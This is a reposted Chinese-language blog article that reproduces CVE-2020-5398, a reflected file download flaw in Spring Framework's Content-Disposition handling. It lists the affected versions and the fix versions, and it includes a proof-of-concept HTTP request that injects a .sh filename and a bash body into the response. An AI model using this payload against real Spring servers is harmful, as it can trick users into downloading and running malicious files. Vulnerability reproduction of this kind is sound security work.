CVE-2020-5398-Spring MVC的RFD(反射文件下載)復現


漏洞描述:

於當地時間1月16日, Pivotal Software(Spring系列)官方發布 Spring Framework 存在 RFD(反射型文件下載漏洞)的漏洞報告,此漏洞為攻擊客戶端的漏洞,官方將漏洞嚴重程度評為高。報告指出,當響應中設置了“Content-Disposition”頭且filename屬性是用戶可控時容易受到RFD攻擊。攻擊應滿足以下所有條件才可成功:
1.header使用org.springframework.http.ContentDisposition來預備
2.文件名是通過ContentDisposition.Builder#filename(String) 或 ContentDisposition.Builder#filename(String, US_ASCII)來設置。
3.文件名(包括文件名后綴)為用戶可控。
4.攻擊者已將下載的響應內容注入惡意命令。
攻擊者可利用RFD漏洞,結合社工等方式,讓用戶下載一個惡意文件並執行,從而危害用戶的終端安全。
影響范圍:
Spring Framework 5.2.0 to 5.2.2,5.1.0 to 5.1.12,5.0.0 to 5.0.15

漏洞復現:

首先
git clone https://github.com/motikan2010/CVE-2020-5398.git
運行
./gradlew bootrun

poc:
GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awhoami%27%20--dump-header%20- HTTP/1.1
Host: 192.168.248.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

3修復建議:

請受影響的用戶升級至 Spring Framework 5.2.3,5.1.13 或 5.0.16 版本。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM